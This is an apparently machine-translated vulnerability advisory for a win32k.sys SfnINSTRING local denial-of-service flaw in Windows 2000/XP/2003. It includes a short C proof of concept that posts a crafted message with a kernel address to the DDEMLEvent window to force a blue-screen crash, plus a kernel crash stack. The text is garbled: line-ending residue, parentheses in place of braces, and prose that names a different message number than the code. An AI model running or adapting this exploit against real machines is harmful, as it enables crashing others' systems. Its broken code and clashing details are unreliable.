Windows 2000/XP/2003 win32k.sys SfnINSTRING local kernel Denial of Service Vulnerability =0D
=0D
Effect : Microsoft Windows 2000/XP/2003 full patch =0D
=0D
=0D
Author:MJ0011=0D
Published: 2010-04-22=0D
=0D
=0D
Vulnerability Details: =0D
=0D
=0D
Win32k.sys in DispatchMessage when the last call to xxxDefWindowProc, this function in dealing with some =0D
Message, will call gapfnScSendMessage this function table function to process,=0D
which under the deal 2000/xp/2003 0x4c No. message, there will be SfnINSTRING function called this function when the lParam is not empty, =0D
direct that the lParam is a memory pointer, and pull data directly from the address=0D
despite the use of the function of the SEH, but as long as the kernel address transmission errors will still cause the system BSOD =0D
=0D
=0D
Exploit code: =0D
=0D
# Include "stdafx.h" =0D
# Include "windows.h" =0D
int main (int argc, char * argv []) =0D
( =0D
printf("Microsoft Windows Win32k.sys SfnINSTRING Local D.O.S Vuln\nBy MJ0011\nth_decoder$126.com\nPressEnter");=0D
=0D
getchar();=0D
=0D
HWND hwnd = FindWindow ("DDEMLEvent", NULL); =0D
=0D
if (hwnd == 0) =0D
( =0D
   printf ("cannot find DDEMLEvent Window! \ n"); =0D
   return 0; =0D
) =0D
=0D
PostMessage (hwnd, 0x18d, 0x0, 0x80000000); =0D
=0D
=0D
return 0; =0D
) =0D
=0D
Common crash stack: =0D
=0D
kd> kc =0D
=0D
win32k! SfnINSTRING =0D
win32k! xxxDefWindowProc =0D
win32k! xxxEventWndProc =0D
win32k! xxxDispatchMessage =0D
win32k! NtUserDispatchMessage =0D
.... =0D
=0D
Windows 7/Vista no such problem =0D
=0D
Thanks: =0D
=0D
Thanks to my colleagues LYL to help me discovered this vulnerability =0D
=0D